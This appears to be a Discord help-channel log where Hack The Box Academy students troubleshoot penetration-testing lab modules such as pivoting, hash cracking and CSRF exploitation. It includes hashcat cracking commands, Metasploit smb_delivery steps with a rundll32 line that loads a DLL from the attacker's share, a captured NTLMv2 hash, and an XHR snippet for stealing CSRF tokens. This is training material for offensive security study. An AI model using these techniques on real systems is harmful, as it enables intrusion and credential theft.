#modules

1 messages · Page 184 of 1

fathom pendant
#

Also wrap the output in triple backticks for easier parsing

dull moth
#

the snmp port is closed but trying this port is a guess once they use pop3 and imap?

fathom pendant
fathom pendant
#

"Management Server"

sterile epoch
#

the main target 172.16.6.155 is in the same subnet I am trying to ping it but no response

sterile epoch
#

the sub mask is 16

fathom pendant
#

If it was the gateway would be 172.16.0.1

#

Not 172.16.5.1

#

Check route print

sterile epoch
# fathom pendant Check `route print`
Interface List
  9...00 50 56 b9 e8 a2 ......vmxnet3 Ethernet Adapter
  4...00 50 56 b9 09 b8 ......vmxnet3 Ethernet Adapter #2
  1 Software Loopback Interface 1
IPv4 Route Table
Active Routes:
Network Destination        Netmask          Gateway       Interface  Metric
          0.0.0.0          0.0.0.0       172.16.5.1     172.16.5.150    271
          0.0.0.0          0.0.0.0       10.129.0.1    10.129.42.198     15
       10.129.0.0      255.255.0.0         On-link     10.129.42.198    271
    10.129.42.198  255.255.255.255         On-link     10.129.42.198    271
   10.129.255.255  255.255.255.255         On-link     10.129.42.198    271
        127.0.0.0        255.0.0.0         On-link         127.0.0.1    331
        127.0.0.1  255.255.255.255         On-link         127.0.0.1    331
  127.255.255.255  255.255.255.255         On-link         127.0.0.1    331
       172.16.0.0      255.255.0.0         On-link      172.16.5.150    271
     172.16.5.150  255.255.255.255         On-link      172.16.5.150    271
   172.16.255.255  255.255.255.255         On-link      172.16.5.150    271
        224.0.0.0        240.0.0.0         On-link         127.0.0.1    331
        224.0.0.0        240.0.0.0         On-link      172.16.5.150    271
        224.0.0.0        240.0.0.0         On-link     10.129.42.198    271
  255.255.255.255  255.255.255.255         On-link         127.0.0.1    331
  255.255.255.255  255.255.255.255         On-link      172.16.5.150    271
  255.255.255.255  255.255.255.255         On-link     10.129.42.198    271
Persistent Routes:
  Network Address          Netmask  Gateway Address  Metric
          0.0.0.0          0.0.0.0       172.16.5.1  Default
sterile epoch
#

nope

fathom pendant
#

You're missing a middleman host, literally reread the section and it'll click

#

Idk why you're being persistent about this.

#

I am entirely correct

#

I have completed this module

#

I even missed the same thing my first time

#

Re-read and it clicked

#

There's a middle host with another user

sterile epoch
#

I am not doubting you I just cannot find it but I will check again

fathom pendant
sterile epoch
#

yep got it

placid edge
#

yo marcie. Have you done the skill assesment for Attacking Common Applications

fathom pendant
sterile epoch
#

I was just going on the ip for the task

fathom pendant
sterile epoch
#

and never did a check for the one in the section

#

I tried using ligolo and doing a ping sweep nothing popped up yet

#

so I was confused

fathom pendant
#

There's a reason I phrased a -> b -> c

#

If you're using ligolo you don't need to do the rdpoversocks thing

sterile epoch
#

yea but I wanted to try rdp

fathom pendant
#

¯_(ツ)_/¯

sterile epoch
#

when i could not so I thought of doing it with ligolo then rdo

fathom pendant
#

Either way. You looked over a step in the chain. (Which the section gives you creds for)

#

Bc this section is mostly about double pivots

#

Also you can rdp through ligolo

#

As a just FYI :)

sterile epoch
#

Thanks for helping me

sterile epoch
#

so I was doing and my instance got expired going to try tomorrow

placid edge
#

85% done now with the cpts. i think i was at 70% on friday and now i feel like i can see the devil

tawdry comet
#

Right there with you. Down to windows privesc, report, and enterprise modules

agile torrent
#

Are there any sorts of sites where you can have a url for a short amount of time (kinda like a temporary email) and see all the traffic that goes to it? Seem to remember using one for a module ages ago.

hallow remnant
#

Module: ADVANCED XSS AND CSRF EXPLOITATION
Section: Bypassing CSRF Tokens via CORS Misconfigurations

I'm struggling with my payload and would really appreciate some help if someone was offering. I seem to be struggling with even grabbing the token value.

scarlet solstice
#

Hello everyone, I'm currently working on the SOC Analyst path and I seem to have difficulties on the Windows Event Logs and Finding Evil. In section "Tapping into ETW" When I launch the attack and capture the log and I review the etw.log I cannot find the answer it is asking for. I am using CTRL F to match the similarity on the what the screenshot shows but get no results. Can anyone assist?

placid edge
agile torrent
#

awesome, exactly was I was looking for. thanks!

placid edge
#

you can also use ngrok

#

but yeah

agile torrent
#

alg, was attempting some oob sqli but didn't really work. thanks tho

potent ermine
slender harness
#

@next bronze @tranquil axle good news and bad news everyone else is having a hard time 💀

#

So we are gonna email prof

scarlet solstice
indigo locust
#

PASSWORD ATTACKS >>> Passwd, Shadow & Opasswd
>>> Examine the target using the credentials from the user Will and find out the password of the "root" user. Then, submit the password as the answer.

I was able to transfer the shadow.bak and passwd.bak file from target machine to attack machine and unshadowed both files to file called "unshadowed.hashes". I'm stuck on trying to crack the hash based on given resource folder in HTB but it fails for some reason. Can someone help who went through same module?

potent ermine
# scarlet solstice Do you remember what command you used?

I'm not good at powershell so I just googled how to do it. Essentially I was trying to cat out the file and grep "seatbelt" so that I could have a smaller file to search for the answer. If you need more guidance feel free to DM me.

next bronze
#

I hope yall can get the point across that that module requires knowledge of all the previous modules, or at least get them to do the lab themselves

indigo locust
limpid frigate
limpid frigate
#

i remember now but can not find that section :((

rustic sage
limpid frigate
#

yeah i think it was loveyou1 or smth

rustic sage
#

i spent a lot of time trying to look for that question too lmfao

rustic sage
#

also don't use rockyou.txt

indigo locust
#

I used that

rustic sage
#

use the mutated list for the passwords from the module to crack the hash

indigo locust
#

but the output says exhaused with by customizing the given password file in module

rustic sage
#

mutate the password list

indigo locust
#

I have mutated the password list and the outcome of hashcat is "Exhausted". I can't find what is wrong leading me to that error

rustic sage
#

well I can say the same too

indigo locust
#

im retaking the steps as advised and get back to you in few minutes

hidden trellis
#

can anyone please help me with Advanced Deserialization Attacks - Example 1: JSON.. I have a payload but unable to get a shell (edited)

indigo locust
#

is uploading pic snips disabled?

dire abyss
#

anyone having issues spawning a target right now?

indigo locust
# rustic sage mutate the password list

So below are the commands I ran, let me know if find any problems:

hashcat --force password -r custom.rule --stdout | sort -u > mutated.txt

hashcat -m 1800 -a 0 unshadowed.hashes mutated.txt -o file.cracked


Host memory required for this attack: 65 MB

Dictionary cache built:
* Filename..: mutated.txt
* Passwords.: 94044
* Bytes.....: 1034072
* Keyspace..: 94044
* Runtime...: 0 secs

Approaching final keyspace - workload adjusted.  

                                                 
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: sha512crypt $6$, SHA512 (Unix)
Hash.Target......: unshadowed.hashes
Time.Started.....: Fri Jan 19 03:08:02 2024 (1 min, 27 secs)
Time.Estimated...: Fri Jan 19 03:09:29 2024 (0 secs)
Guess.Base.......: File (mutated.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:     2118 H/s (5.65ms) @ Accel:16 Loops:1024 Thr:1 Vec:4
Recovered........: 2/4 (50.00%) Digests, 2/4 (50.00%) Salts
Progress.........: 376176/376176 (100.00%)
Rejected.........: 0/376176 (0.00%)
Restore.Point....: 94044/94044 (100.00%)
Restore.Sub.#1...: Salt:3 Amplifier:0-1 Iteration:4096-5000
Candidates.#1....: yellow93 -> Yellow99!

Started: Fri Jan 19 03:08:01 2024
Stopped: Fri Jan 19 03:09:30 2024
tidal kelp
#

shout out for @misty current for nice hint

cobalt trench
#

I don't fully understand the question. I found a couple different possible answers but none of them seem to work

#

This is the footprinting smb module

quick magnet
#

hi i'm facing problem when try sed -i, can u help me ?

rustic sage
indigo locust
#

I assume because the hashcat wasnt successful and hence the file.txt wasn't created

rustic sage
#

you're supposed to steal passwd.bak, shadow.bak, then unshadow, use the hashcat command to crack the file, and it should be in your home directory in your attack box

#

the -o specifies the output file.cracked, which you should be able to cat out.

#

in that file there will be new hashes, one for root which you crack using any tool of your choice

outer kettle
#

thank you so much

indigo locust
rustic sage
#

it should be on your machine, not the target

indigo locust
#

Im sorry I meant attack machine

#

I trasnferred it to attack machine

rustic sage
#

yes good, now you can unshadow and crack it with the mutated list

indigo locust
#

lol I did unshadow:

unshadow passwd.bak shadow.bak > ~/Desktop/unshadowed.hashes

rustic sage
#

okay now just crack it with hashcat using the command from before the output file is file.cracked and it should be in the location you ran hashcat from

#

if you are truly lost as to where file.cracked is use locate file.cracked

indigo locust
#

even if hashcat status is Exhausted, you think file.cracked would be created?

#

No result:

locate file.cracked
locate: warning: database ‘/var/cache/locate/locatedb’ is more than 8 days old (actual age is 259.9 days)

next bronze
#

you can't use locate without first updating the database, you should know where the file is saved, either in your current dir or the specified path

#

what's your hashcat command

indigo locust
#

@rustic sage I sent you some pictures for better visual input of my work

tranquil axle
indigo locust
# next bronze what's your hashcat command
  1. So initially I transferred passwd.bak and shadow.bak from target machine by using scp

  2. I unshadowed passed.bak and shadow.bak to file called unshadowed.hashes

  3. then mutated password file given through module

  4. Ran hashcat to crack the unshadow.hashes but it fails and gives "Exhausted" status

" hashcat -m 1800 -a 0 unshadowed.hashes mutated.txt -o ~/Desktop/file.cracked "

next bronze
#

so is there the ~/Desktop/file.cracked file

tranquil axle
#

In your output above it said it removed 2 hashes from the input (because they were already cracked), I forgot the command but can’t you do —show or something with hashcat to see the pot of those?

next bronze
#

oh didn't see they sent the output, yes use --show and don't need to specify the outfile

nimble yoke
#

does anyone know this, im trying to install kernell on my fresh kali and i already got all the resourses im aware of and was able to downlaod it but then when doing the make command it takes like 30 min to compile and at the end it gives an error Makefile:234:__sub-make Error 2 when trying to make Kernel. anyone know what this means?

#

ive tried downlaoding diff versions and then tried re compiling like 5 times already

indigo locust
next bronze
#

why don't you try it first

indigo locust
#

did it but didnt work

fathom pendant
#

"didn't work" what type of error do you get?

#

if you scroll up in the terminal -> do you see the cracked ones

#

did the file unshadowed.cracked get created

#

note: the default output mode outputs hash:password so the password will be at the end of each hash it cracked

indigo locust
fathom pendant
#

ok, what about my other questions; what error did you get (if any)

indigo locust
#

I dont get any error but hashcat shows "Exhausted" as status and does not populate a unshadowed.cracked

fathom pendant
#

ok so scrolling up do the ones it did crack show in the terminal?

next bronze
#

if you used --show hashcat wouldn't attempt to crack the hashes

fathom pendant
#

do not dm me without asking

#
  1. it's common courtesy
  2. read #rules
next bronze
fathom pendant
#

hashcat unshadowed.hashes --show -o unshadowed.cracked might work to give an output file

fathom pendant
indigo locust
#

checking it

next bronze
fathom pendant
#

the output should be just in the current directory

#

¯_(ツ)_/¯

indigo locust
indigo locust
fathom pendant
#

well the hashes have a username attached to them

rustic sage
#

Guys someone plz help how to start my career in ethical hacker

indigo locust
compact patrolBOT
fathom pendant
indigo locust
rustic sage
fathom pendant
#

bc you couldn't think of that on your own

indigo locust
#

Just kidding follow the HTB CPTS pathway and keep grinding

rustic sage
#

Ok

indigo locust
fathom pendant
#

also if you didn't crack it in the pwnbox why would the hashes be loaded in the pwnbox fwiw

#

you said you got it with your own vm, why not stick to that

#

Also running pwnbox and the vpn on your own vm can (and does) cause connection issues to the targets

indigo locust
#

bruh giving hint/tips doesn't cost the person any money

#

Everybody is built with different thought process and approach problems

fathom pendant
#

¯_(ツ)_/¯

indigo locust
#

your way works for you and someones work for them

fathom pendant
#

i'm just givin you shit since you were ready to just throw "Give up" as a joke to someone that's new

#

¯_(ツ)_/¯

indigo locust
#

having someone helping you connect the bridge together is what people do not go off like you did my friend

#

joke is a joke bro

fathom pendant
#

nah a joke is meant to be funny

#

a joke would have been "Turn on your computer"

#

or something along those lines

#

Telling someone "give up" is just offputting

indigo locust
#

Alright Professor McGonagall you win, have a good day/night😂 🤦‍♂️

fathom pendant
#

don't spend another 2 weeks on the next bits ¯_(ツ)_/¯

indigo locust
fathom pendant
#

also fwiw don't forget to keep track of passwords in that module

fathom pendant
#

2 weeks sounds like you didn't reach out for assistance once what you were trying wasn't working

#

¯_(ツ)_/¯

indigo locust
#

Maybe if you were attentive in the channel then I'm sure you would have seen the comments for help

#

¯_(ツ)_/¯

fathom pendant
#

for the previous sections

#

phrasing is also important

#

were you stuck for 2 weeks at that part, or the module itself

#

there's a HUGE difference

indigo locust
#

alright bruh don't know why your ranting so much rather than just accepting the joke and being quite unless if Im talking with disturbing 10 year old kid

fathom pendant
#

if you don't want me to view you as silly for wasting 2 weeks on a single section over reasonable for the whole module ¯_(ツ)_/¯

indigo locust
#

but never the less you have good day my friend and hopefully your calmer till someones next question

fathom pendant
#

lol you assume i'm upset/mad

#

besides i've helped loads of people with issues

fathom pendant
#

after you complete the path i'd highly suggest you revisit this module to make sure you understand it if you're planning on tackling the exam

#

¯_(ツ)_/¯

#

that and the file transfers module

#

as you seemed to have issues previously with file transfers

sharp nexus
#

halp

#

I think I deleted the flag

#

I'm working on the CRUD Api module, and I updated the london's entry to "Flag", deleted it, then deleted baltimore, but there's no flag

#

oop nvm

#

am hackerman and figured it out

sullen geyser
#

Hii

#

Kya how h

#

Any one online

sharp nexus
#

?

fathom pendant
sharp nexus
sullen geyser
#

Ok I am new in HTB can any oklne help me

sharp nexus
#

No

fathom pendant
sharp nexus
#

no problem lmao

compact patrolBOT
sullen geyser
#

From where you are

fathom pendant
sharp nexus
#

you should visit it

fathom pendant
#

i will repeat again: read #welcome on how to access more of the server

fathom pendant
sharp nexus
#

oh rip

fathom pendant
#

ye only a handful of channels are available if your account isn't linked

sharp nexus
#

Yeah, I thought the instruction for the module were rename city to flag, delete city, then search for flag. But obviously it'd be deleted if I deleted it, so I just renamed mephis and it worked again

#

cuz faaaahhhkkkk mephis lol

sinful olive
#

IN WINDOWS PRIVILEGE ESCALATION - Windows server
I do the commands for smb_delivery but it does'nt open a session for me, instead it returns the hash for htb-student.. what is missing?
I tried to upload a screenshot but for some reason I can't add it to this channel.
my steps:
use exploit/windows/smb/smb_delivery
set srvhost 10.10.....
exploit
and in windows machine in cmd: rundll32.exe \10.10....\aZaOLL\test.dll,0
it gives me that:

[SMB] NTLMv2-SSP Client : 10.129.97.145
[SMB] NTLMv2-SSP Username : WINLPE-2K8\htb-student
[SMB] NTLMv2-SSP Hash : htb-student::WINLPE-2K8:bb99524dcf3917d1:b4a699ffc6ddbd9a317217b1b6e6cb34:010100.... (shortened it..)

sessions

Active sessions

No active sessions.

fathom pendant
#

Hashes are great

#

They can be used for a lot

sinful olive
fathom pendant
#

Yes

#

Are you sure you set the right options and used the right commands

sinful olive
#

yes.. tried like 10 times.. Its not what they wanted in the module.. they wanted a session, but it doesn't return one

fathom pendant
#

is your LHOST correct?

sinful olive
#

yes - it is ifconfig tun0 right?

fathom pendant
#

usually the issue is missing one step in the process

#

and yes tun0

sinful olive
#

can I send you screenshot in private? for some reason I can't send here

fathom pendant
#

no

#

and not have large codeblocks yeeted if you format them

sinful olive
#

ah ok thanks

fathom pendant
#

spam protection type of thing

#

so skids and trolls don't spam the channel with nsfw/l images

sinful olive
fathom pendant
#

"started reverse TCP handler on Public IP

#

that's the public IP of your pwnbox instance BTW

sinful olive
fathom pendant
#

yes

#

the targets don't have internet access; so they can't reach out to that public IP

sinful olive
fathom pendant
#

idk then ¯_(ツ)_/¯

#

and you re-ran the exploit yeah?

sinful olive
fathom pendant
#

by that i mean after adjusting the lhost to the correct IP; you ran exploit again?

hallow remnant
#

Were you able to sort this out? I'm struggling on the same section.

visual pollen
#

Can someone confirm me that rdp almost all the time il pretty unusable? 😞

nimble yoke
#

anyone know why my Available networks is greyed out in Kali. In my VM i made sure to pick Bridge and then on the usb I enabled my network usb too.

fathom pendant
#

This isn't a support group for Kali

visual pollen
silver pagoda
#

can someone help me with the monitored htb box, please dm

spring moon
#

Hi guys, anyone having the issue with this question.

Module name: WINDOWS ATTACKS & DEFENSE
Section name: Print Spooler & NTLM Relaying
Issue: Ambiguous answer format to 2nd Question

After performing the previous attack, connect to DC1 (172.16.18.3) as 'htb-student:HTB_@cademy_stdnt!' and make the appropriate change to the registry to prevent the PrinterBug attack. Then, restart DC1 and try the same attack again. What is the error message seen when running dementor.py?.

fathom pendant
dreamy solar
#

Hello I have a problem this question normaly it is correct

#

Can you help me please

misty current
# dreamy solar

POST DATA request, you would need to URL encode the & or else it's gonna take it as a new parameter. Which Module is this?

dreamy solar
dreamy solar
tranquil axle
#

retype the &, a "&" in post body is the sign for a new parameter

misty current
#

select & and do ctrl+u

#

It should URL encode it for you.

limber river
dreamy solar
#

no but in the question, I d just need receive a answer

dreamy solar
tranquil axle
#

& is not the right answer then it seems

limber river
lusty thicket
# dreamy solar

idk what section that is but try another injection character

lusty hearth
lusty thicket
#

use url encoded tabs instead of a space

lusty hearth
#

doesnt that space in your payload break it?

barren salmon
#

hay mates. Thanks for the your help yesterday. i have now completed my first box. i just wanted to say that 🙂

dreamy solar
#

I tested all posibility I don't find

buoyant escarp
#

Space as + maybe

brittle arch
#

Hello !
I am trying to solve the issue in Footprinting Lab - Med.

I am having an issue reading the directory after NFS mounting

#

I tried chmod 777

#

But it is still ( Permission is denied )

dreamy solar
tulip dragon
#

sometime rdp machine are very very laggy

#

what I can do to make less lag?

#

btw I am running those rdp machine from htb academy attack box, will it be less laggy if I run those rdp machine from my local vm?

agile torrent
#

newline doesn't work in urls as \n though, so use url encoding (%0a)

#

or & and |

paper crag
#

I cannot get this fourth skills assessment question...any hints?

eternal rain
#

Hello, is here any support? I dont get the password reset sent to my email adress?

eternal rain
#

uhmm so any idea?

lusty thicket
compact patrolBOT
topaz locust
#

In the module Advanced XSS and CSRF Exploitation, section xss bypass.
I have a working xss payload tested in chrome and firefox, with exfiltration.
However I get no response or interaction from the "admin" user.
At first I thought the URL might be too long with the html response so I just sent /x, but that didn't change anything.
solved it, for everyone else with this issue, ||this is the first time ports matter for the admin||

plain coral
#

I feel like Completing the Windows privilege escalation module prior to tackling the Attacking and Enumerating Active Directory modules would have been significantly beneficial for the second skills assessment haha

limber river
dreamy jacinth
#

Hey, i want to ask which one is better ... using the pwnbox with the modules in academy for the labs or i should fire up my own Kali Linux VM?

vestal dust
#

hello

#

i was doing shells and payloads module and i am stuck in Antak-WebShell part

#

i am not able import aspx file

#

but according to walkthrough it should work

#

but in vhost it is throwing an error to only upload .zip or tar.gz file

#

15 mints back i was able to upload aspx file when I was doing laudanum path

rustic sage
#

anyone remember the module name in which we have to perform phisphing attack , creating lnk file. Not able to find that section

next bronze
#

are you confusing it with the oscp course kekw

rustic sage
#

🤔 lol

next bronze
dreamy jacinth
#

is the Browser instance more powerful then my Kali VM? on academy ?

snow ridge
#

Any quick fix for machines not spawning in Attacking common applications (osTicket and gitlab) Propably other ones too

rustic sage
kind turret
next bronze
late moth
#

the intro to assembly module is killing me lol

dreamy jacinth
#

i have a powerful RIG

#

so i just don t know which one to play around for long term use

rustic sage
next bronze
dreamy jacinth
#

gotcha

next bronze
dreamy jacinth
#

and for password cracking its better to use the GPU to my knowledge. But i don t think i have the full performance on vm or do i?

next bronze
#

nope, hashcat don't have access to the gpu in a vm, run it on your host

snow ridge
dreamy jacinth
#

Gotcha lads

snow ridge
#

GPU cracking is like 40x faster for me

dreamy jacinth
next bronze
#

hashcat will always be faster with a gpu, that's what it's designed for

snow ridge
#

Depends on the hashtype and how much power your gpu has, wordlist has nothing do with it

dreamy jacinth
#

i see

misty saddle
#

I'm currently doing the Nibbles Module for the CPTS exam. And I want to use my own VM instead of the PwnBox. But I cannot ping the target. I just get:
$ ping 10.129.172.48
PING 10.129.172.48 (10.129.172.48) 56(84) bytes of data.
From 10.10.16.1 icmp_seq=1 Destination Host Unreachable
From 10.10.16.1 icmp_seq=2 Destination Host Unreachable
From 10.10.16.1 icmp_seq=3 Destination Host Unreachable
From 10.10.16.1 icmp_seq=4 Destination Host Unreachable
From 10.10.16.1 icmp_seq=5 Destination Host Unreachable
From 10.10.16.1 icmp_seq=6 Destination Host Unreachable
From 10.10.16.1 icmp_seq=7 Destination Host Unreachable
From 10.10.16.1 icmp_seq=8 Destination Host Unreachable
From 10.10.16.1 icmp_seq=9 Destination Host Unreachable

Anyone else had this issue?

#

My OpenVPN looks fine, It does not return any errors.

next bronze
#

give it a bit to spawn, if not reset

misty saddle
#

Thanks a lot, I'll try!

next bronze
#

your vpn is fine since you can reach the router

misty saddle
#

yeah exactly, i've never had issues with it on reguarly machines.

misty saddle
late moth
#

So I'm stuck in the intro to assebmly module debugging with GDB section for 2 days. The question is asking find the hex value of "rax" when we reach the instruction at <_start+16>. I set a breakpoint at that address and step to <_start+16>. Then attempt to read it with x/$rip and it spits out a hex value. But it's not correct. Any advice on what I'm doing wrong?

next bronze
dreamy solar
#

Hello I have a problem with this paylaod... I think is my pipe | but I test two possibility and it is not ok.... can you help me please ?

gray shoal
#

why i dont find my "downloads" directory? following some guide and i dont have it

silver pagoda
#

Does anyone now a way to get remote code execution on a Nagios XI server if you have the admin account on the webapp???

next bronze
glad patio
#

Hi! I've terribly stuck on a question about "for loop" and decoding a hash code. Can anyone help me?
https://forum.hackthebox.com/t/introduction-to-bash-scripting-hack-the-box-academy/243473/30?u=glebius

glad patio
next bronze
#

that's not what the question asked for

urban walrus
#

Yo guys, so I'm currently doing the skills assessment for SQLMap, I found sql injection and I was able to exploit it. The thing is once I dump the specified table(Final_flag). I get
<blank>
in the
content
column(Where the flag is supposed to be). I'm dumping the whole database right now but because it's time-based SQLi, it may take a while. I was wondering if anyone has any trouble with the skills assessment? I also restarted the machine multiple times

glad patio
next bronze
#

yes, and you have already done that

#

take a wild guess what the answer is from your output

glad patio
#

Still no idea what it is. Thought maybe I should write the loop in the answer

next bronze
#

it could not be more obvious, like I said take a wild guess what the answer is from your output

#

also helps to understand your own code

hollow lake
#

I'm going out for like 30 minutes..if you can't find a solution, you can dm me later

glad patio
next bronze
#

the answer is literally in your post

glad patio
urban walrus
tribal rover
hallow remnant
#

Module: ADVANCED XSS AND CSRF EXPLOITATION
Section: Bypassing CSRF Tokens via CORS Misconfigurations

I'm struggling with the payload creation in this module and would welcome feedback. Copying the module's payload directly doesn't work; at first I thought it was an issue with just variable/parameter renaming, but then I broke it down to just the first half that's presented:

<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://vulnerablesite.htb/profile.php', false);
xhr.withCredentials = true;
xhr.send();
console.log(xhr.responseText);  //I added this for debugging
</script>

And went and clicked "View Exploit" and noticed the following console error:

#

So I'm realizing that the /profile.php endpoint isn't ever getting loaded by the request, hence why I'm not able to grab/pass the CSRF token.

#

But I'm not sure what the fix is meant to be

#

Would welcome feedback.

coarse lichen
#

Hello, I wanted to know if I was the only one whose rdp on Windows machines of the Academy is really slow and crash really often.
If someone found a solution for this I'm not against it.

maiden field
#

Understanding Log Sources & Investigating with Splunk
Skills Assessment

Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through SPL searches against all data the process that started the infection. Answer format: _.exe

Can someone dm me I got the answer but I haven't got it the right way it was just luck. So if someone can help me on how to search that it would be nice 🙂

steel grail
#

Hi everyone

cinder harbor
#

Hi Everyone, quick question. For the SIEM module question : Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Either create a new visualization or edit the "Failed logon attempts [Admin users only]" visualization, if it is available, so that it includes failed logon attempt data where the username field contains the keyword "admin" anywhere within it. What should you specify after user.name: in the KQL query?
I tried admin, *admin its not taking it. It works in Elastic search platform but not sure why the answer is not accepted. Any ideas ?

#

I understand it wants me to specify "admin only" and admin or *admin does that so not sure why HTB isnt taking the answer 🤔

shut ivy
#

anyone else having problems using ssh to connect to boxes it worked the first time i did it now it keeps saying connection closed by [adresss] port 22

drowsy coyote
#

helloi'm new here

rustic sage
#

Hey all, can anyone point me in the right direction with the bizzness machine

#

I refuse to believe that the only solution to it is bruteforce XD

fathom pendant
#

Read #welcome on how to access more of the server

barren salmon
#

so i was hacking he nibble box, and had my port 8080 open, to make af file transfer to my target hos, when i suddenly get a surprise connection. someone else connected to me! the connection was made by www.whitehouse.gov:443. super wired. have anyone of you guys tried something similar ?

fathom pendant
#

Pwnbox has its interfaces open to the internet. Still funny though

barren salmon
steel grail
#

can someone help me

#

Im doing web requests HTB academy section POST and im having issues

analog dock
#

I’m sure since you asked such a detailed question someone can help

steel grail
#

let me get to it

#

I am trying to get the server_ip file to populate in the network tab, and nothing is showing up. only a bunch of CSS and PHP files

#

ive tried clearing, and redoing it probably 10 times now and nothing

#

any idea why that might be?

#

wait i might be stupid, give me one moment

fathom pendant
#

Chat: is he stupid

lament rover
#

Yo wassup y'all

#

I been wondering how y'all be getting them robux

#

can y'all help me hack robux

fathom pendant
steel grail
lament rover
fathom pendant
lament rover
#

You're just not a SkibidiToiletSigmaAmogusSussyBaka666HackerSigma

fathom pendant
#

No, you don't

steel grail
#

yea. i am actually lost, woul be cool to get a hand 🙂

fathom pendant
#

This isn't a robux hacking server

lament rover
fathom pendant
lament rover
fathom pendant
#

@solid python prank 'em john

steel grail
#

its super simple, im just not getting the data i need

lament rover
#

I'm about yo hack mee6 and turn him black

fathom pendant
lament rover
#

and take over the server with pop smoke and snoopdog my beloved

fathom pendant
#

Omg it's "HIM"

valid roost
fathom pendant
#

Not the server for this

valid roost
#

anyways how di hack mind craft

thorn urchin
#

<@&861185840277487616>

fathom pendant
lament rover
valid roost
#

bu are you are you estarted

lament rover
valid roost
fathom pendant
#

Yes

valid roost
#

skibiditte doitlette wins bro

#

grrrr!!!

thorn urchin
#

<@&861185840277487616> got a 2 for 1

fathom pendant
#

It's a 2fer1 combo

full nimbus
#

you guys have patience for sure 😄

#

I mean I'm not here often, but all the time there's some idiots messing around

fathom pendant
lusty thicket
steel grail
#

im just trying to seek help

fathom pendant
#

What have you tried?

steel grail
#

All the task is, is to get a server request to populate in the network tab on dev console but im getting different results than the academy guide

#

unless i do have it and am just confus3d

rapid acorn
#

howx ytod i Get clash ropyalke ?

#

i hate

jolly cradle
fathom pendant
lusty thicket
#

same man

fathom pendant
#

@jolly cradle hey guess what ^

steel grail
lusty thicket
#

<@&861185840277487616>

fathom pendant
#

There's huge bot/troll campaigns going on rn btw @jolly cradle

#

They're targeting public servers

languid dawn
jolly cradle
#

👀

thorn urchin
fathom pendant
solid python
#

Ah. Cringe.

fathom pendant
solid python
#

They're all JJK themed I hate it

languid fjord
solid python
#

Sociopathy

fathom pendant
languid dawn
#

brain worms

steel grail
#

ahhhh i think i figured i out

leaden yew
#

Question regarding "Kerberos Attacks: Constrained Delegation Overview & Attacking from Windows":

  1. Under "Abuse Any Service", the attack being referred to is the only option because Constrained Delegation is enabled with Use Kerberos Only within the properties of the service account?
  2. Under "Impersonate Any User", the attack referred to is only available because Constrained Delegation is enabled with Use any authenticaiton protocol within the properties of the service account?
ivory sandal
#

Hey guys, on the linux privilege escalation module, sudo section, I keep trying to run the git clone command for the exploit but it keeps return 'could not resolve host: github.com' is this an internet problem?

autumn pilot
#

the target machines are not connected to the internet

misty saddle
#

Yooo, do you guys also experience that the boxes in the academy modules are "slow" or laggy? It's pretty random. Sometimes it give me huge 25 second delays and then its snappy for 25 seconds and then the delays again. Is there a fix?

languid fjord
compact patrolBOT
misty saddle
#

Thanks, I wrote to them yesterday and still no answer sadge_business

#

it's pretty hard to edit in VIM when the cursor keeps flying everywhere xd

steel grail
#

what is wrong with this command?? keeps giving me an error .... curl -X POST -d '{"search":"Flag:}' -b 'PHPSESSID=68v86efjbp2eaen62v4uuco0f1t' -H 'Content-Type: application/json' http://83.136.250.104:45684/search.php

faint rampart
#

Might be why.

steel grail
#

still says no URL specifed

ivory sandal
autumn pilot
#

by transfering it

fathom pendant
steel grail
#

isnt it a url?

fathom pendant
#

Or try putting the url first then the flags

languid fjord
steel grail
#

err ip

fathom pendant
steel grail
#

hmmm let me try one more thing

steel grail
fathom pendant
steel grail
#

:Ooooo

#

you are right

fathom pendant
#

Rami3l hinted that your json request was wrong btw

steel grail
#

Yes was just confused what he meant

#

I was following another person on medium when I got stuck

fathom pendant
#

... {a:b} is json

fathom pendant
steel grail
#

My b

fathom pendant
#

Most of the modules are pretty decently written, especially the intro ones,

polar skiff
#

Hi I’m in password attacks - password mutations …. I’m like 3 hours and still no luck any recomendación ?
I did split the file in 16 parts keep waiting ? 🥲

steel grail
polar skiff
fathom pendant
#

-t 48

polar skiff
fathom pendant
#

what's your command?

polar skiff
#

I keep waiting update y late hahaha maybe 3 hours more 🫠

fathom pendant
#

It shouldn't take 3 hours

#

Reset the target lol

polar skiff
#

Segment

fathom pendant
#

Bc you don't need to segment it

#

It's completely doable without splitting it

polar skiff
#

-P is for the password list and segments are the splits

fathom pendant
#

Don't split

polar skiff
#

Hmm ok

fathom pendant
#

Fuck off

rustic sage
fathom pendant
#

<@&861185840277487616>

polar skiff
#

I reset and try it again no splitting

fathom pendant
rustic sage
polar skiff
#

Tens marcie

fathom pendant
#

Should be~ 5-10 minutes maybe a bit longer

lusty thicket
#

hecker

rustic sage
lusty thicket
hallow kiln
#

Do people really fall for this?

lusty thicket
faint rampart
lapis oar
polar skiff
jolly cradle
#

my password is hunter2

hallow kiln
#

I only see *******

jolly cradle
#

Oh neat

#

I didnt know Discord had a feature that hides passwords as asterisks

fathom pendant
#

User safety is important

faint rampart
jolly cradle
#

My github password is 12345

fathom pendant
#

I love spaceballs

#

Unfortunately no sequel

jolly cradle
#

Very unfortunate

#

I was looking forward to Spaceballs 2: The Search for More Money

fathom pendant
#

I thought it was the quest for more money

ivory sandal
#

For the sudo module on Linux Priv Esc sudo section, for some reason I cant run sudo -l without it prompting me for a password, any reason why? I tried running the hax me a sandwich exploit but that didnt work either

leaden yew
#

Does anyone know the difference between Kerberos Contrained Delegation attacks where Constrained is set vs Constrained w/ Protocol Transition is set?

median kettle
#

can someone help with the windows privilege escalation module for the citrix breakout section?

thorn urchin
leaden yew
thorn urchin
#

its because with protocol transition enabled its not guranteed the original user(that the service is supposed to be requesting on behalf of) even has a kerberos ticket of their own. And a TGT is kinda needed for a TGS to be requested normally. Protocol transition is the DC handwaving the TGT requirement and just trusting the service.

leaden yew
#

Good explanation, thank you!

thorn urchin
#

np

#

Kerberos Attacks module is awesome btw

fathom pendant
faint rampart
#

ntlmrelay attacks module too is fighting for my cubes lmao

leaden yew
thorn urchin
#

